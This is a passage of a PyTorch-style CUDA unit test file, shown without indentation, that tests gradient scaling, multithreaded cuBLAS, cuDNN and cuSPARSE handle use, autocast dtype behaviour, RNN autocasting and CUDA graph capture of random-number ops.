scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
# Copy mod_control1 and mod_scaling1 back the device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
def test_cublas_multiple_threads_same_device(self):
# Note, these parameters should be very carefully tuned
# Too small number makes it hard for the racing condition
# to happen, while too large number sometimes cause hang
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16
self.assertFalse(torch.is_autocast_enabled())
with torch.autocast('cuda', dtype=fast_dtype):
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.autocast('cuda', enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \
or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell'
if not skip_test:
if should_error_from_not_implemented:
with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.autocast('cuda'):
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.autocast('cuda'):
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.autocast('cuda', ):
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter, we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.autocast('cuda', enabled=True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.autocast('cuda', ):
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# Test is used to check, if autocast recaches the same parameters
# when executed in a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.autocast('cuda', ):
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.autocast('cuda', ):
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
